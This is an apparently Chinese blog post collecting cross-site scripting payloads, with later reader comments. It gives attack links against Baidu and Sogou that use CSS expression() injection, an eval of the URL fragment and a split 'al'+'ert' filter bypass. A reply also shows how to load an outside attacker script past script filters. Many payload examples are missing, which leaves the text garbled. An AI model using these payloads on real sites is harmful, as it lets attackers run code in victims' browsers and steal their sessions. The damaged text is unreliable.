XSS 跨站代码大全 本人小小的总结

By：blackend

      (最常见的跨站代码）

 (?是用tab键弄出来的空格）

 (/**/ 表示注释）

html实体： 

unicode：


	上面是普通的


	163的filter过滤语句跨站代码



	filter己将上述label理解为三个label,语法分析与其后语句关联分析时己失效.

exploit:
hhhhh
 (己和谐)

	不懂CSS的 百度下 "Css中的filter常用滤镜属性及语句大全"


	上面中window.rrr==1等语句是给window对象的方法定义一个值，判断这个值运行一次.


	来看看HTML5跨站代码


	引入媒体类测试代码Example:



	表单点击测试代码Example:


 


 X


	鼠标事件测试代码Example:


	Before HTML5:

Injecting here onmouseover=alert(Injected value)>

	With HTML5:

Injecting here onfocus=alert(Injected value) autofocus>

	DIV 测试代码Example:


DRAG ME!!


	引入框架测试代码Example:



	再看看 百度想跨站代码 分两个0.0


	这些是曾经的..

http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert('xss'));
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert('xss'));

	tn和bar两个参数对应在页面的输出是两个input表单值，可以使用”(双引号)闭合表单值，加入CSS属性跨站，页面具体输出如下：



	这个漏洞只能在IE下使用，FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色，这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码：

eval(unescape(location.hash.substr(1)))

	给window对象的方法定义一个值，判断这个值运行一次代码：

(window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1

	最后得到完美的攻击链接：

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%29

	恩 很好的思路 用给window对象的方法定义一个值，判断这个值运行一次代码 以及 # 搞定火狐.


	还有 80vul的 搜狗跨站 (已经修补)

http://pinyin.sogou.com/skins/search.php?word=WCRTESTINPUT000000" onmouseover=window["al"+"ert"](1)

	搜狗过滤的关键字alert 这样分开写 一样能跨


	献丑了,有什么写得不好的 说吧.. O(∩_∩)O~

留言评论（旧系统）：


testxss @ 2013-02-23 04:54:54
 (最常见的跨站代码）

 (?是用tab键弄出来的空格）
本站回复：



佚名 @ 2013-02-23 22:29:44
今天遇到个，只把：，(，&过掉，除了能用用vbs弹个框框，其他啥都干不了
本站回复：
╮(╯_╰)╭


佚名 @ 2013-02-25 16:34:26
scr ?新标签？亮了·
本站回复：
原作者个二货，居然不检查。那个不叫标签，叫属性。


xss永远的新手 @ 2013-12-15 02:35:06
核总。


这个怎么用这个语句加载xss平台的js啊 src=
本站回复：
你这新手也太新了……

document.write('你的js')


xss永远的新手 @ 2013-12-15 21:43:14
我知道这个函数。不是必须在javascript才能用吗。我的意思是怎么在这个标签里，加入js文件。因为对方过滤script，无法用
本站回复：
'+'ipt>')>






    



    文章作者

    Nuclear'Atk
  

    上次更新

    

      2013-02-25
    
  

    许可协议

    Nuclear'Atk（核攻击）网络安全实验室版权所有，转载请注明出处。
  


文章来源于lcx.cc:XSS 跨站代码大全 本人小小的总结